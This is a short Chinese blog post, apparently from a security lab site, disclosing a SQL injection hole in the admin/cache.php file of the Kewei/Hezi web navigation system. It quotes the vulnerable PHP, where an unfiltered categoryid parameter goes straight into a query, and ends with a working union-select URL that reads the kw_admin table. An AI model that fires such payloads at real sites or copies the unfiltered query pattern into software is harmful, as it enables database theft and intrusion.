作者:心灵
纯属看不惯这些修改别人产品去卖钱的。。。。我们要素质,斯文,不说粗口……
趁着饭没煮好,花几分钟找下漏洞。
科威网址导航系统和盒子导航系统的程序文件一样的,就是界面不一样。
经典对白,看代码……
admin/cache.php:
<?php
session_start( );
set_time_limit ( 0 );
error_reporting( E_ALL || E_NOTICE );
define ( ROOT , dirname ( dirname ( $_SERVER['SCRIPT_FILENAME'] ) ) . '/' );
require_once ROOT.'include/smarty_inc.php';
require_once ROOT.'include/mysql_inc.php';
require_once ROOT.'include/config_inc.php';
$db = new db_mysql();
$db -> connect( $dbhost, $dbuser, $dbpwd, $dbname);
$type = !empty( $_GET['type'] ) ? trim( $_GET['type'] ) : ""; //前奏了...
$DefaultSkin = $db -> select("SELECT * FROM `".$dbprefix."_option` WHERE `Name`= 'DefaultSkin'");
$DefaultSkin = $DefaultSkin[0]['Value'];
if( $type == "category" )
{
$categoryid = !empty( $_GET['categoryid'] ) ? trim( $_GET['categoryid'] ) : "";
//这里没有过滤..........
$temp = $db -> select("SELECT * FROM `".$dbprefix."_category` WHERE `ID`=".$categoryid);
//死在这里了。。。。。。。。。。。。
$templates->assign("name",$temp[0]['Name']);
$templates->assign("id",$temp[0]['ID']);
$templates->display(ROOT."templates/".$DefaultSkin."/category.tpl");
}
else
{
$templates->display(ROOT."templates/".$DefaultSkin."/index.tpl");
}
?> |
超经典的注入漏洞。。。。
测试 Exp:
http://127.0.0.1/admin/cache.php?type=category&categoryid=1%20and%201=2%20union%20select%201,2,3,5,6,7,8,9,10,Name%20from%20kw_admin |
完毕,等他出个补丁再过几天再挖一个。。。
文章作者
Nuclear'Atk
上次更新
2011-01-12
许可协议
Nuclear'Atk(核攻击)网络安全实验室版权所有,转载请注明出处。